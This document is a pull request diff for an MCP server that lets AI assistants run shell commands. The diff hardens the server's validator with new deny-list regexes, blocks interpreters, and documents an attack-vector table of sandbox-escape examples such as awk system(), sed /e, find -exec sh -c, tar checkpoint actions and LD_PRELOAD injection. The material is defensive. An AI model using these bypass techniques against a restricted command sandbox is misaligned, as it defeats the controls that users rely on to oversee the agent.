### PR TITLE
fix: block arbitrary command execution via trusted utilities

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -39,3 +39,4 @@ site/
 # Local development
 .python-version
 .env.local
+.venv

--- a/.gitignore
+++ b/.gitignore
@@ -40,3 +40,4 @@ site/
 .python-version
 .env.local
 .venv
+uv.lock

--- a/README.md
+++ b/README.md
@@ -6,6 +6,8 @@
 
 An MCP server that lets AI assistants run terminal commands safely. Commands are categorized (read/write/system), directories are whitelisted, and dangerous patterns are blocked automatically.
 
+---
+
 ## Quick Start
 
 ```bash
@@ -23,6 +25,8 @@ Run the server:
 cmd-line-mcp                        # default config
 cmd-line-mcp --config config.json   # custom config
 ```
+
+---
 
 ## Claude Desktop Setup
 
@@ -45,31 +49,36 @@ Add to `~/Library/Application Support/Claude/claude_desktop_config.json`:
 
 Restart Claude Desktop after saving.
 
-> **Tip**: Set `require_session_id: false` to prevent approval loops in Claude Desktop.
+> [!TIP]
+> Set `require_session_id: false` to prevent approval loops in Claude Desktop.
+
+---
 
 ## How It Works
 
 Commands go through a validation pipeline before execution:
 
-1. **Pattern matching** &mdash; blocks dangerous constructs (`system()`, shell escapes, etc.)
-2. **Command classification** &mdash; each command must be in the read, write, system, or blocked list
-3. **Directory check** &mdash; target directory must be whitelisted or session-approved
-4. **Approval check** &mdash; write/system commands require session approval
+1. **Pattern matching** — blocks dangerous constructs (`system()`, shell escapes, etc.)
+2. **Command classification** — each command must be in the read, write, system, or blocked list
+3. **Directory check** — target directory must be whitelisted or session-approved
+4. **Approval check** — write/system commands require session approval
 
-Pipes, semicolons, and `&` are supported &mdash; each segment is validated independently.
+Pipes, semicolons, and `&` are supported — each segment is validated independently.
 
 ### What's Allowed
 
-| Category | Commands | Approval |
-|----------|----------|----------|
-| **Read** | `ls`, `cat`, `grep`, `find`, `head`, `tail`, `sort`, `wc`, ... | Auto |
-| **Write** | `cp`, `mv`, `rm`, `mkdir`, `touch`, `chmod`, `awk`, `sed`, ... | Required |
-| **System** | `ps`, `ping`, `curl`, `ssh`, `xargs`, ... | Required |
-| **Blocked** | `sudo`, `bash`, `sh`, `python`, `eval`, ... | Always denied |
+| Category    | Commands                                                       | Approval       |
+|:------------|:---------------------------------------------------------------|:--------------:|
+| **Read**    | `ls`, `cat`, `grep`, `find`, `head`, `tail`, `sort`, `wc`, …  | Auto           |
+| **Write**   | `cp`, `mv`, `rm`, `mkdir`, `touch`, `chmod`, `awk`, `sed`, …  | Required       |
+| **System**  | `ps`, `ping`, `curl`, `ssh`, `xargs`, …                       | Required       |
+| **Blocked** | `sudo`, `bash`, `sh`, `python`, `eval`, …                     | Always denied  |
 
 ### What's Blocked
 
-Shells, scripting interpreters, and known command-execution vectors are blocked &mdash; including indirect execution through `awk system()`, `sed /e`, `find -exec`, `tar --checkpoint-action`, `env`, and `xargs`. See [docs/SECURITY.md](docs/SECURITY.md) for the full list.
+Shells, scripting interpreters, and known command-execution vectors are blocked — including indirect execution through `awk system()`, `sed /e`, `find -exec`, `tar --checkpoint-action`, `env`, and `xargs`. See [docs/SECURITY.md](docs/SECURITY.md) for the full list.
+
+---
 
 ## Configuration
 
@@ -84,6 +93,8 @@ export CMD_LINE_MCP_COMMANDS_READ="jq,rg"
 ```
 
 See [docs/CONFIGURATION.md](docs/CONFIGURATION.md) for full configuration reference, MCP tool documentation, and directory security details.
+
+---
 
 ## License
 

--- a/README.md
+++ b/README.md
@@ -4,153 +4,29 @@
 [![Python Versions](https://img.shields.io/pypi/pyversions/cmd-line-mcp.svg)](https://pypi.org/project/cmd-line-mcp/)
 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
 
-A secure Model Control Protocol (MCP) server that allows AI assistants to execute terminal commands with controlled directory access and command permissions.
-
-## Overview
-
-Command-Line MCP provides a security layer between AI assistants and your terminal. It implements a dual security model:
-
-1. **Command Permissions**: Commands are categorized as read (safe), write (changes data), or system (affects system state), with different approval requirements
-2. **Directory Permissions**: Commands can only access explicitly whitelisted directories or directories approved during a session
-
-AI assistants interact with this server using standardized MCP tools, enabling safe terminal command execution while preventing access to sensitive files or dangerous operations. You can configure the security level from highly restrictive to more permissive based on your needs.
-
-## Key Features
-
-| Security | Usability | Integration |
-|----------|-----------|-------------|
-| Directory whitelisting | Command categorization (read/write/system) | Claude Desktop compatibility |
-| Command filtering | Persistent session permissions | Standard MCP protocol |
-| Pattern matching | Command chaining (pipes, etc.) | Auto-approval options |
-| Dangerous command blocking | Intuitive approval workflow | Multiple config methods |
-
-## Supported Commands (out of the box)
-
-### Read Commands
-- `ls`, `pwd`, `cat`, `less`, `head`, `tail`, `grep`, `find`, `which`, `du`, `df`, `file`, `sort`, etc.
-
-### Write Commands  
-- `cp`, `mv`, `rm`, `mkdir`, `rmdir`, `touch`, `chmod`, `chown`, etc.
-
-### System Commands
-- `ps`, `top`, `htop`, `who`, `netstat`, `ifconfig`, `ping`, etc.
-
-## Security Architecture
-
-The system implements a multi-layered security approach:
-
-```
-┌───────────────────────────────────────────────────────────────┐
-│                   COMMAND-LINE MCP SERVER                     │
-├──────────────────┬────────────────────────┬───────────────────┤
-│ COMMAND SECURITY │   DIRECTORY SECURITY   │ SESSION SECURITY  │
-├──────────────────┼────────────────────────┼───────────────────┤
-│ ✓ Read commands  │ ✓ Directory whitelist  │ ✓ Session IDs     │
-│ ✓ Write commands │ ✓ Runtime approvals    │ ✓ Persistent      │
-│ ✓ System commands│ ✓ Path validation      │   permissions     │
-│ ✓ Blocked list   │ ✓ Home dir expansion   │ ✓ Auto timeouts   │
-│ ✓ Pattern filters│ ✓ Subdirectory check   │ ✓ Desktop mode    │
-└──────────────────┴────────────────────────┴───────────────────┘
-```
-
-All security features can be configured from restrictive to permissive based on your threat model and convenience requirements.
-
-### Command Execution Hardening
-
-Powerful utilities like `awk`, `sed`, `find`, `tar`, `env`, and `xargs` can be abused to execute arbitrary commands even when shells are blocked. The server detects and blocks these vectors:
-
-| Attack Vector | Example | Defense |
-|---|---|---|
-| awk `system()` / getline | `awk 'BEGIN{system("id")}'` | Dangerous pattern match |
-| sed `/e` execute flag | `sed 's/x/id/e'` (any delimiter) | Delimiter-aware regex |
-| find `-exec` with interpreters | `find -exec sh -c 'id' {} +` | Blocks bare and full-path interpreters |
-| env launching interpreters | `env -i sh -c id` | Flag-aware pattern match |
-| xargs launching interpreters | `xargs -I{} sh -c id` | Flag-aware pattern match |
-| tar command execution | `tar --checkpoint-action=exec=id` | Blocks `--to-command`, `-I`, `--use-compress-program` |
-| cp/mv to system paths | `cp evil /etc/passwd` | Blocks writes to `/etc`, `/boot`, `/bin`, `/sbin`, `/usr/*bin` |
-| Linker variable injection | `env LD_PRELOAD=evil.so cmd` | Blocks `LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_INSERT_LIBRARIES` |
-| Direct interpreter invocation | `python3 -c '...'` | Shells and scripting languages explicitly blocked |
-| Command substitution | `$(id)`, `` `id` `` | Blocked by pattern |
-
-All interpreters (sh, bash, zsh, python, perl, ruby, node, lua, php, etc.) are explicitly blocked, not just absent from allowlists. Custom patterns can be added via the `dangerous_patterns` configuration.
+An MCP server that lets AI assistants run terminal commands safely. Commands are categorized (read/write/system), directories are whitelisted, and dangerous patterns are blocked automatically.
 
 ## Quick Start
 
 ```bash
-# Install
-git clone https://github.com/yourusername/cmd-line-mcp.git
+pip install cmd-line-mcp
+
+# Or from source
+git clone https://github.com/andresthor/cmd-line-mcp.git
 cd cmd-line-mcp
-python -m venv venv
-source venv/bin/activate
 pip install -e .
-cp config.json.example config.json
-
-# Run
-cmd-line-mcp                        # With default config
-cmd-line-mcp --config config.json   # With specific config
 ```
 
-### Configuration Options
+Run the server:
 
-The server supports four configuration methods in order of precedence:
-
-1. **Built-in default configuration** (default_config.json)
-2. **JSON configuration file** (recommended for customization)
-   ```bash
-   cmd-line-mcp --config config.json
-   ```
-3. **Environment variables** (for specific overrides)
-   ```bash
-   export CMD_LINE_MCP_SECURITY_WHITELISTED_DIRECTORIES="~,/tmp"
-   ```
-4. **.env file** (for environment-specific settings)
-   ```bash
-   cmd-line-mcp --config config.json --env .env
-   ```
-
-The default configuration is stored in `default_config.json` and is included with the package. You can copy this file to create your own custom configuration.
-
-#### Core Configuration Settings
-
-```json
-{
-  "security": {
-    "whitelisted_directories": ["/home", "/tmp", "~"],
-    "auto_approve_directories_in_desktop_mode": false, 
-    "require_session_id": false,
-    "allow_command_separators": true
-  },
-  "commands": {
-    "read": ["ls", "cat", "grep"], 
-    "write": ["touch", "mkdir", "rm"],
-    "system": ["ps", "ping"]
-  }
-}
-```
-
-#### Environment Variable Format
-
-Environment variables use a predictable naming pattern:
-```
-CMD_LINE_MCP_<SECTION>_<SETTING>
-```
-
-Examples:
 ```bash
-# Security settings
-export CMD_LINE_MCP_SECURITY_WHITELISTED_DIRECTORIES="/projects,/var/data"
-export CMD_LINE_MCP_SECURITY_AUTO_APPROVE_DIRECTORIES_IN_DESKTOP_MODE=true
-
-# Command additions (these merge with defaults)
-export CMD_LINE_MCP_COMMANDS_READ="awk,jq,wc"
+cmd-line-mcp                        # default config
+cmd-line-mcp --config config.json   # custom config
 ```
 
-### Claude Desktop Integration
+## Claude Desktop Setup
 
-#### Setup
-
-1. Install [Claude for Desktop](https://claude.ai/download)
-2. Configure in `~/Library/Application Support/Claude/claude_desktop_config.json`:
+Add to `~/Library/Application Support/Claude/claude_desktop_config.json`:
 
 ```json
 {
@@ -167,171 +43,47 @@ export CMD_LINE_MCP_COMMANDS_READ="awk,jq,wc"
 }
 ```
 
-#### Recommended Claude Desktop Settings
+Restart Claude Desktop after saving.
 
-For best experience, configure:
-- `require_session_id: false` - Essential to prevent approval loops
-- `auto_approve_directories_in_desktop_mode: true` - Optional for convenient access
-- Include common directories in your whitelist
+> **Tip**: Set `require_session_id: false` to prevent approval loops in Claude Desktop.
 
-After configuration, restart Claude for Desktop.
+## How It Works
 
-## AI Assistant Tools
+Commands go through a validation pipeline before execution:
 
-The server provides these MCP tools for AI assistants:
+1. **Pattern matching** &mdash; blocks dangerous constructs (`system()`, shell escapes, etc.)
+2. **Command classification** &mdash; each command must be in the read, write, system, or blocked list
+3. **Directory check** &mdash; target directory must be whitelisted or session-approved
+4. **Approval check** &mdash; write/system commands require session approval
 
-| Tool | Purpose | Needs Approval |
-|------|---------|----------------|
-| `execute_command` | Run any command type | Yes, for write/system commands |
-| `execute_read_command` | Run read-only commands | Directory approval only |
-| `approve_directory` | Grant access to a directory | N/A - it's an approval tool |
-| `approve_command_type` | Grant permission for command category | N/A - it's an approval tool |
-| `list_directories` | Show authorized directories | No |
-| `list_available_commands` | Show command categories | No |
-| `get_command_help` | Get command usage guidance | No |
-| `get_configuration` | View current settings | No |
+Pipes, semicolons, and `&` are supported &mdash; each segment is validated independently.
 
-### Tool Examples
+### What's Allowed
 
-#### Directory Management
+| Category | Commands | Approval |
+|----------|----------|----------|
+| **Read** | `ls`, `cat`, `grep`, `find`, `head`, `tail`, `sort`, `wc`, ... | Auto |
+| **Write** | `cp`, `mv`, `rm`, `mkdir`, `touch`, `chmod`, `awk`, `sed`, ... | Required |
+| **System** | `ps`, `ping`, `curl`, `ssh`, `xargs`, ... | Required |
+| **Blocked** | `sudo`, `bash`, `sh`, `python`, `eval`, ... | Always denied |
 
-```python
-# Check available directories
-dirs = await list_directories(session_id="session123")
-whitelisted = dirs["whitelisted_directories"]
-approved = dirs["session_approved_directories"]
+### What's Blocked
 
-# Request permission for a directory
-if "/projects/my-data" not in whitelisted and "/projects/my-data" not in approved:
-    result = await approve_directory(
-        directory="/projects/my-data", 
-        session_id="session123"
-    )
-```
+Shells, scripting interpreters, and known command-execution vectors are blocked &mdash; including indirect execution through `awk system()`, `sed /e`, `find -exec`, `tar --checkpoint-action`, `env`, and `xargs`. See [docs/SECURITY.md](docs/SECURITY.md) for the full list.
 
-#### Command Execution
+## Configuration
 
-```python
-# Read commands (read permissions enforced)
-result = await execute_read_command("ls -la ~/Documents")
+The server works out of the box with sensible defaults. Customize via JSON config, environment variables, or `.env` files:
 
-# Any command type (may require command type approval)
-result = await execute_command(
-    command="mkdir -p ~/Projects/new-folder", 
-    session_id="session123"
-)
-```
-
-#### Get Configuration
-
-```python
-# Check current settings
-config = await get_configuration()
-whitelist = config["directory_whitelisting"]["whitelisted_directories"]
-```
-
-
-## Directory Security System
-
-The server restricts command execution to specific directories, preventing access to sensitive files.
-
-### Directory Security Modes
-
-The system supports three security modes:
-
-| Mode | Description | Best For | Configuration |
-|------|-------------|----------|--------------|
-| **Strict** | Only whitelisted directories allowed | Maximum security | `auto_approve_directories_in_desktop_mode: false` |
-| **Approval** | Non-whitelisted directories require explicit approval | Interactive use | Default behavior for standard clients |
-| **Auto-approve** | Auto-approves directories for Claude Desktop | Convenience | `auto_approve_directories_in_desktop_mode: true` |
-
-### Whitelisted Directory Configuration
-
-```json
-"security": {
-  "whitelisted_directories": [
-    "/home",                  // System directories
-    "/tmp",
-    "~",                      // User's home
-    "~/Documents"             // Common user directories
-  ],
-  "auto_approve_directories_in_desktop_mode": false  // Set to true for convenience
-}
-```
-
-### Directory Approval Flow
-
-1. Command is requested in a directory
-2. System checks:
-   - Is the directory in the global whitelist? → **Allow**
-   - Has directory been approved in this session? → **Allow**
-   - Neither? → **Request approval**
-3. After approval, directory remains approved for the entire session
-
-### Path Format Support
-
-- Absolute paths: `/home/user/documents`
-- Home directory: `~` (expands to user's home)
-- User subdirectories: `~/Downloads`
-
-### Claude Desktop Integration
-
-The server maintains a persistent session for Claude Desktop, ensuring directory approvals persist between requests and preventing approval loops.
-
-## Command Customization
-
-The system uses command categorization to control access:
-
-| Category | Description | Example Commands | Requires Approval |
-|----------|-------------|------------------|-------------------|
-| Read | Safe operations | ls, cat, find | No |
-| Write | Data modification | mkdir, rm, touch | Yes |
-| System | System operations | ps, ping, ifconfig | Yes |
-| Blocked | Dangerous commands | sudo, bash, eval | Always denied |
-
-### Customization Methods
-
-```json
-// In config.json
-{
-  "commands": {
-    "read": ["ls", "cat", "grep", "awk", "jq"],
-    "write": ["mkdir", "touch", "rm"],
-    "system": ["ping", "ifconfig", "kubectl"],
-    "blocked": ["sudo", "bash", "eval"]
-  }
-}
-```
-
-**Environment Variable Method:**
 ```bash
-# Add to existing lists, not replace (comma-separated)
-export CMD_LINE_MCP_COMMANDS_READ="awk,jq"
-export CMD_LINE_MCP_COMMANDS_BLOCKED="npm,pip"
+# Whitelist directories
+export CMD_LINE_MCP_SECURITY_WHITELISTED_DIRECTORIES="/projects,/var/data"
+
+# Add commands (merges with defaults)
+export CMD_LINE_MCP_COMMANDS_READ="jq,rg"
 ```
 
-The MCP server merges these additions with existing commands, letting you extend functionality without recreating complete command lists.
-
-### Command Chaining
-
-The server supports three command chaining methods:
-
-| Method | Symbol | Example | Config Setting |
-|--------|--------|---------|---------------|
-| Pipes | `\|` | `ls \| grep txt` | `allow_command_separators: true` |
-| Sequence | `;` | `mkdir dir; cd dir` | `allow_command_separators: true` |
-| Background | `&` | `find . -name "*.log" &` | `allow_command_separators: true` |
-
-All commands in a chain must be from the supported command list. Security checks apply to the entire chain.
-
-**Quick Configuration:**
-```json
-"security": {
-  "allow_command_separators": true  // Set to false to disable all chaining
-}
-```
-
-To disable specific separators, add them to the `dangerous_patterns` list.
+See [docs/CONFIGURATION.md](docs/CONFIGURATION.md) for full configuration reference, MCP tool documentation, and directory security details.
 
 ## License
 

--- a/README.md
+++ b/README.md
@@ -55,6 +55,25 @@ The system implements a multi-layered security approach:
 
 All security features can be configured from restrictive to permissive based on your threat model and convenience requirements.
 
+### Command Execution Hardening
+
+Powerful utilities like `awk`, `sed`, `find`, `tar`, `env`, and `xargs` can be abused to execute arbitrary commands even when shells are blocked. The server detects and blocks these vectors:
+
+| Attack Vector | Example | Defense |
+|---|---|---|
+| awk `system()` / getline | `awk 'BEGIN{system("id")}'` | Dangerous pattern match |
+| sed `/e` execute flag | `sed 's/x/id/e'` (any delimiter) | Delimiter-aware regex |
+| find `-exec` with interpreters | `find -exec sh -c 'id' {} +` | Blocks bare and full-path interpreters |
+| env launching interpreters | `env -i sh -c id` | Flag-aware pattern match |
+| xargs launching interpreters | `xargs -I{} sh -c id` | Flag-aware pattern match |
+| tar command execution | `tar --checkpoint-action=exec=id` | Blocks `--to-command`, `-I`, `--use-compress-program` |
+| cp/mv to system paths | `cp evil /etc/passwd` | Blocks writes to `/etc`, `/boot`, `/bin`, `/sbin`, `/usr/*bin` |
+| Linker variable injection | `env LD_PRELOAD=evil.so cmd` | Blocks `LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_INSERT_LIBRARIES` |
+| Direct interpreter invocation | `python3 -c '...'` | Shells and scripting languages explicitly blocked |
+| Command substitution | `$(id)`, `` `id` `` | Blocked by pattern |
+
+All interpreters (sh, bash, zsh, python, perl, ruby, node, lua, php, etc.) are explicitly blocked, not just absent from allowlists. Custom patterns can be added via the `dangerous_patterns` configuration.
+
 ## Quick Start
 
 ```bash

--- a/default_config.json
+++ b/default_config.json
@@ -62,12 +62,15 @@
       "\\$\\{\\w+\\}",
       "`",
       "system\\s*\\(",
-      "s/[^/]*/[^/]*/[a-zA-Z0-9]*e",
-      "-exec\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "\\bs([/|@#!%,])[^'\"]*?\\1[^'\"]*?\\1[a-zA-Z]*e",
+      "-(exec|execdir|ok|okdir)\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
       "\\benv\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node)\\b",
       "\\bxargs\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "\\|&",
       "--to-command",
-      "--checkpoint-action=exec"
+      "--checkpoint-action=exec",
+      "--use-compress-program",
+      "\\btar\\b.*\\s-I\\s"
     ]
   },
   "output": {

--- a/default_config.json
+++ b/default_config.json
@@ -39,7 +39,12 @@
       "screen", "tmux", "nc", "telnet", "nmap",
       "dd", "mkfs", "mount", "umount", "shutdown", "reboot",
       "passwd", "chpasswd", "useradd", "userdel", "groupadd", "groupdel",
-      "eval", "exec", "source", "."
+      "eval", "exec", "source", ".",
+      "python", "python2", "python3",
+      "perl", "ruby", "node", "nodejs",
+      "lua", "php",
+      "tclsh", "wish", "Rscript",
+      "expect", "script"
     ],
     "dangerous_patterns": [
       "rm\\s+-rf\\s+/",

--- a/default_config.json
+++ b/default_config.json
@@ -1,7 +1,7 @@
 {
   "server": {
     "name": "cmd-line-mcp",
-    "version": "0.5.1",
+    "version": "0.6.0",
     "description": "MCP server for safely executing command-line tools",
     "log_level": "INFO"
   },
@@ -63,9 +63,9 @@
       "`",
       "system\\s*\\(",
       "\\bs([/|@#!%,])[^'\"]*?\\1[^'\"]*?\\1[a-zA-Z]*e",
-      "-(exec|execdir|ok|okdir)\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
-      "\\benv\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node)\\b",
-      "\\bxargs\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "-(exec|execdir|ok|okdir)\\s+(\\S+/)?(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "\\benv\\s+(.*\\s)?(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node)\\b",
+      "\\bxargs\\s+(.*\\s)?(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
       "\\|&",
       "--to-command",
       "--checkpoint-action=exec",

--- a/default_config.json
+++ b/default_config.json
@@ -55,7 +55,14 @@
       "2>&1",
       "\\$\\(",
       "\\$\\{\\w+\\}",
-      "`"
+      "`",
+      "system\\s*\\(",
+      "s/[^/]*/[^/]*/[a-zA-Z0-9]*e",
+      "-exec\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "\\benv\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node)\\b",
+      "\\bxargs\\s+(sh|bash|zsh|ksh|csh|fish|python[23]?|perl|ruby|node|env)\\b",
+      "--to-command",
+      "--checkpoint-action=exec"
     ]
   },
   "output": {

--- a/default_config.json
+++ b/default_config.json
@@ -70,7 +70,9 @@
       "--to-command",
       "--checkpoint-action=exec",
       "--use-compress-program",
-      "\\btar\\b.*\\s-I\\s"
+      "\\btar\\b.*\\s-I\\s",
+      "\\b(cp|mv)\\b.*(/etc/|/boot/|/bin/|/sbin/|/usr/(local/)?s?bin/)",
+      "\\b(LD_PRELOAD|LD_LIBRARY_PATH|DYLD_INSERT_LIBRARIES)="
     ]
   },
   "output": {

--- a/docs/CONFIGURATION.md
+++ b/docs/CONFIGURATION.md
@@ -1,0 +1,130 @@
+# Configuration
+
+## Configuration Methods
+
+The server supports four configuration methods, in order of precedence:
+
+1. **Environment variables** (highest priority)
+2. **.env file**
+3. **JSON configuration file**
+4. **Built-in defaults** (`default_config.json`)
+
+```bash
+# JSON config
+cmd-line-mcp --config config.json
+
+# With .env overrides
+cmd-line-mcp --config config.json --env .env
+```
+
+### Environment Variables
+
+Environment variables use the pattern `CMD_LINE_MCP_<SECTION>_<SETTING>`:
+
+```bash
+export CMD_LINE_MCP_SECURITY_WHITELISTED_DIRECTORIES="/projects,/var/data"
+export CMD_LINE_MCP_SECURITY_AUTO_APPROVE_DIRECTORIES_IN_DESKTOP_MODE=true
+
+# Command lists merge with defaults (not replace)
+export CMD_LINE_MCP_COMMANDS_READ="awk,jq"
+export CMD_LINE_MCP_COMMANDS_BLOCKED="npm,pip"
+```
+
+### JSON Configuration
+
+Copy `default_config.json` and customize:
+
+```json
+{
+  "security": {
+    "whitelisted_directories": ["/home", "/tmp", "~"],
+    "auto_approve_directories_in_desktop_mode": false,
+    "require_session_id": false,
+    "allow_command_separators": true
+  },
+  "commands": {
+    "read": ["ls", "cat", "grep"],
+    "write": ["touch", "mkdir", "rm"],
+    "system": ["ps", "ping"],
+    "blocked": ["sudo", "bash", "eval"]
+  }
+}
+```
+
+## Command Categories
+
+| Category | Description | Examples | Requires Approval |
+|----------|-------------|----------|-------------------|
+| Read | Safe, read-only operations | `ls`, `cat`, `grep`, `find`, `head`, `tail`, `sort`, `wc` | No |
+| Write | Data modification | `cp`, `mv`, `rm`, `mkdir`, `touch`, `chmod`, `awk`, `sed` | Yes |
+| System | System-level operations | `ps`, `ping`, `curl`, `ssh`, `xargs` | Yes |
+| Blocked | Dangerous commands | `sudo`, `bash`, `sh`, `python`, `eval` | Always denied |
+
+### Command Chaining
+
+| Method | Symbol | Example | Config |
+|--------|--------|---------|--------|
+| Pipes | `\|` | `ls \| grep txt` | `allow_command_separators: true` |
+| Sequence | `;` | `mkdir dir; cd dir` | `allow_command_separators: true` |
+| Background | `&` | `find . -name "*.log" &` | `allow_command_separators: true` |
+
+All commands in a chain must be from the supported command list. Set `allow_command_separators: false` to disable chaining entirely.
+
+## Directory Security
+
+The server restricts command execution to specific directories.
+
+### Security Modes
+
+| Mode | Description | Best For |
+|------|-------------|----------|
+| **Strict** | Only whitelisted directories | Maximum security |
+| **Approval** | Non-whitelisted require explicit approval | Interactive use (default) |
+| **Auto-approve** | Auto-approves for Claude Desktop | Convenience |
+
+### Directory Approval Flow
+
+1. Command targets a directory
+2. Is the directory in the global whitelist? &rarr; Allow
+3. Has the directory been approved this session? &rarr; Allow
+4. Otherwise &rarr; Request approval (persists for session)
+
+### Path Formats
+
+- Absolute paths: `/home/user/documents`
+- Home directory: `~`
+- User subdirectories: `~/Downloads`
+- Glob patterns in whitelist: `/projects/*`
+
+## MCP Tools
+
+| Tool | Purpose | Needs Approval |
+|------|---------|----------------|
+| `execute_command` | Run any command type | Yes, for write/system |
+| `execute_read_command` | Run read-only commands | Directory approval only |
+| `approve_directory` | Grant access to a directory | N/A |
+| `approve_command_type` | Grant permission for command category | N/A |
+| `list_directories` | Show authorized directories | No |
+| `list_available_commands` | Show command categories | No |
+| `get_command_help` | Get command usage guidance | No |
+| `get_configuration` | View current settings | No |
+
+### Tool Examples
+
+```python
+# Read commands
+result = await execute_read_command("ls -la ~/Documents")
+
+# Write/system commands (may require approval)
+result = await execute_command(
+    command="mkdir -p ~/Projects/new-folder",
+    session_id="session123"
+)
+
+# Directory management
+dirs = await list_directories(session_id="session123")
+result = await approve_directory(
+    directory="/projects/my-data",
+    session_id="session123"
+)
+```

--- a/docs/SECURITY.md
+++ b/docs/SECURITY.md
@@ -1,0 +1,77 @@
+# Security
+
+## Architecture
+
+The server implements three layers of security:
+
+```
+┌──────────────────┬────────────────────────┬───────────────────┐
+│ COMMAND SECURITY │   DIRECTORY SECURITY   │ SESSION SECURITY  │
+├──────────────────┼────────────────────────┼───────────────────┤
+│ Command allow/   │ Directory whitelist    │ Session IDs       │
+│   block lists    │ Runtime approvals      │ Persistent perms  │
+│ Dangerous pattern│ Path normalization     │ Auto timeouts     │
+│   matching       │ Symlink resolution     │ Desktop mode      │
+│ Command type     │ Subdirectory           │                   │
+│   classification │   inheritance          │                   │
+└──────────────────┴────────────────────────┴───────────────────┘
+```
+
+## Command Validation Pipeline
+
+Every command passes through this pipeline before execution:
+
+1. **Dangerous pattern check** &mdash; regex patterns matched against the full command string
+2. **Pipeline/chain splitting** &mdash; `|`, `;`, `&` split into segments, each validated independently
+3. **Block list check** &mdash; each command checked against explicitly blocked commands
+4. **Allow list check** &mdash; each command must appear in read, write, or system lists
+5. **Directory check** &mdash; target directory must be whitelisted or session-approved
+6. **Command type check** &mdash; write/system commands require approval
+
+## Command Execution Hardening
+
+Powerful utilities like `awk`, `sed`, `find`, `tar`, `env`, and `xargs` can be abused to execute arbitrary commands even when shells are blocked. The server detects and blocks these vectors:
+
+| Attack Vector | Example | Defense |
+|---|---|---|
+| awk `system()` / getline | `awk 'BEGIN{system("id")}'` | Dangerous pattern match |
+| sed `/e` execute flag | `sed 's/x/id/e'` (any delimiter) | Delimiter-aware regex |
+| find `-exec` with interpreters | `find -exec sh -c 'id' {} +` | Blocks bare and full-path interpreters |
+| env launching interpreters | `env -i sh -c id` | Flag-aware pattern match |
+| xargs launching interpreters | `xargs -I{} sh -c id` | Flag-aware pattern match |
+| tar command execution | `tar --checkpoint-action=exec=id` | Blocks `--to-command`, `-I`, `--use-compress-program` |
+| cp/mv to system paths | `cp evil /etc/passwd` | Blocks writes to `/etc`, `/boot`, `/bin`, `/sbin`, `/usr/*bin` |
+| Linker variable injection | `env LD_PRELOAD=evil.so cmd` | Blocks `LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_INSERT_LIBRARIES` |
+| Direct interpreter invocation | `python3 -c '...'` | Shells and scripting languages explicitly blocked |
+| Command substitution | `$(id)`, `` `id` `` | Blocked by pattern |
+
+## Blocked Commands
+
+All shells and scripting interpreters are **explicitly blocked**, not just absent from allowlists:
+
+- **Shells**: `bash`, `sh`, `zsh`, `ksh`, `csh`, `fish`
+- **Scripting languages**: `python`, `python2`, `python3`, `perl`, `ruby`, `node`, `nodejs`, `lua`, `php`, `tclsh`, `wish`, `Rscript`
+- **Privilege escalation**: `sudo`, `su`
+- **Dangerous utilities**: `dd`, `mkfs`, `mount`, `umount`, `nc`, `telnet`, `nmap`
+- **Execution primitives**: `eval`, `exec`, `source`, `.`
+- **PTY tools**: `screen`, `tmux`, `expect`, `script`
+
+## Custom Dangerous Patterns
+
+Add regex patterns to `dangerous_patterns` in your config to block additional vectors:
+
+```json
+{
+  "commands": {
+    "dangerous_patterns": [
+      "your-custom-pattern-here"
+    ]
+  }
+}
+```
+
+Patterns are matched against the full command string using `re.search()` before any other validation.
+
+## Reporting Vulnerabilities
+
+If you discover a security vulnerability, please open an issue on GitHub.

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "cmd-line-mcp"
-version = "0.5.1"
+version = "0.6.0"
 description = "Command-line MCP server for safe command execution"
 readme = "README.md"
 authors = [{ name = "Your Name", email = "andresthor@gmail.com" }]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -11,14 +11,13 @@ authors = [{ name = "Your Name", email = "andresthor@gmail.com" }]
 license = { text = "MIT" }
 classifiers = [
   "Programming Language :: Python :: 3",
-  "Programming Language :: Python :: 3.9",
   "Programming Language :: Python :: 3.10",
   "Programming Language :: Python :: 3.11",
   "Programming Language :: Python :: 3.12",
   "License :: OSI Approved :: MIT License",
   "Operating System :: OS Independent",
 ]
-requires-python = ">=3.9"
+requires-python = ">=3.10"
 dependencies = ["mcp>=1.6.0"]
 
 [project.optional-dependencies]

--- a/src/cmd_line_mcp/__init__.py
+++ b/src/cmd_line_mcp/__init__.py
@@ -1,3 +1,3 @@
 """Command-line MCP server for safe command execution."""
 
-__version__ = "0.5.1"
+__version__ = "0.6.0"

--- a/src/cmd_line_mcp/config.py
+++ b/src/cmd_line_mcp/config.py
@@ -3,9 +3,8 @@
 import logging
 import os
 import json
-from importlib.resources import files
-from typing import Dict, Optional, Any, List
 from pathlib import Path
+from typing import Any
 
 # Configure logger
 logger = logging.getLogger(__name__)
@@ -16,8 +15,8 @@ class Config:
 
     def __init__(
         self,
-        config_path: Optional[str] = None,
-        env_file_path: Optional[str] = None,
+        config_path: str | None = None,
+        env_file_path: str | None = None,
     ):
         """Initialize the configuration.
 
@@ -79,7 +78,7 @@ class Config:
             # Look in the root directory (3 levels up from this file)
             root_config_path = Path(__file__).parent.parent.parent / "default_config.json"
             if root_config_path.exists():
